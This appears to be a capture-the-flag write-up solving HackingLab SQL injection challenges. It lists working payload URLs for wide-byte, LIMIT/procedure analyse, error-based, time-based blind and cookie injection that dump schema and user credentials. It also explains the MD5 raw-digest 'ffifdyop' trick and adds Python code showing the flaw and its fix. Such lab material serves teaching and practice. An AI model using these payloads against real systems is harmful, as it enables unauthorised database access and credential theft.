HackingLab Injection Challenges

Injection Filtering: Wide-Byte Injection

#Dump the database name
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,database()%23

#Dump the table names
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273%23

#Dump the column names
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7361655F757365725F73716C6934%23

#Dump the data
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=-1%df' union select 1,group_concat(title_1),group_concat(content_1) from sae_user_sqli4 %23

Is There Any Output After All: LIMIT Injection

#Database
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)%23&num=1

#Table names
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,table_name,0x3f) from information_schema.tables where table_schema=0x6d79646273 limit 0,1))),1)#&num=1

#Column names
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,column_name,0x3f) from information_schema.columns where table_name=0x75736572 limit 2,1))),1)%23&num=1

#Data
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,username,0x3a,password,0x3f) from user limit 2,1))),1)%23&num=1

ErrorBased: Error-Based Injection

#Database
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,database(),0x7e))%23

#Tables
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x6D79646273),0x7e))%23

#Columns
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x6D6F74746F),0x7e))%23

#Data
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(rand(),concat(0x7e,(select concat(motto) from motto limit 3,1),0x7e))%23  

Blind Injection: Time-Based Blind Injection

#Database
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascII(substr(database(),2,1))=121,1,sleep(5))%23

Generic SQL Injection Protection: Cookie Injection

Cookie: PHPSESSID=302e9cf079feae64eca5eb1af7937602;id=1 order by 3
#Database
Cookie: PHPSESSID=302e9cf079feae64eca5eb1af7937602;id=1 union select 1,2,database()

Supposedly a Hashed Password Cannot Be Injected: MD5 Hash Injection

$strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";

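userid is converted to an integer, and pwd is MD5-hashed.
When the second argument of md5() is true, it returns the digest in raw binary format, 16 characters long. When it is false, it returns the 32-character hexadecimal string. The default is false.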

md5('123')         //202cb962ac59075b964b07152d234b70
md5('123',true)    // ,�b�Y[�K-#Kp

We need a string (ffifdyop) whose MD5 digest, when converted to a string, contains 'or', so the query becomes
select * from user where userid="1" and password ="'or'6"
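
Why the raw digest is unsafe to concatenate while the default hexadecimal digest is not, shown as an added example (not code from the original post or the challenge). It models PHP's md5() with Python's hashlib; the function names php_md5, build_query, split_literals and digest_stays_data are hypothetical, and the scanner is a simplified model of MySQL string quoting.

```python
import hashlib

def php_md5(pwd: str, raw: bool = False) -> str:
    """Model of PHP md5($pwd, $raw); raw bytes map 1:1 to chars via latin-1."""
    h = hashlib.md5(pwd.encode("utf-8"))
    return h.digest().decode("latin-1") if raw else h.hexdigest()

def build_query(userid: int, pwd: str, raw: bool) -> str:
    """Concatenate the digest into the query the way the challenge code does."""
    return ("select * from `user` where userid=%d and password='%s'"
            % (userid, php_md5(pwd, raw)))

def split_literals(sql: str):
    """Split SQL into (text outside quotes, [single-quoted literals]).

    Simplified scanner: handles backslash escapes and doubled quotes.
    """
    outside, literals, cur, in_str, i = [], [], [], False, 0
    while i < len(sql):
        c = sql[i]
        nxt = sql[i + 1] if i + 1 < len(sql) else ""
        if in_str and c == "\\" and nxt:          # backslash escape
            cur.append(nxt); i += 2; continue
        if in_str and c == "'" and nxt == "'":    # doubled quote
            cur.append("'"); i += 2; continue
        if c == "'":
            if in_str:                            # closing quote ends the literal
                literals.append("".join(cur)); cur = []
            in_str = not in_str
        elif in_str:
            cur.append(c)
        else:
            outside.append(c)
        i += 1
    return "".join(outside), literals

def digest_stays_data(userid: int, pwd: str, raw: bool) -> bool:
    """True if the digest is still exactly one string literal in the query."""
    _, literals = split_literals(build_query(userid, pwd, raw))
    return literals == [php_md5(pwd, raw)]

if __name__ == "__main__":
    for raw in (True, False):                     # 'ffifdyop' is the page's input
        outside, lits = split_literals(build_query(1, "ffifdyop", raw))
        print("raw" if raw else "hex", digest_stays_data(1, "ffifdyop", raw))
        print("  outside quotes:", outside)
        print("  literals      :", [s.encode("latin-1") for s in lits])
```

Comparing against the default hexadecimal digest, or binding the password as a parameter of a prepared statement, keeps the digest a single literal whatever bytes it contains.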
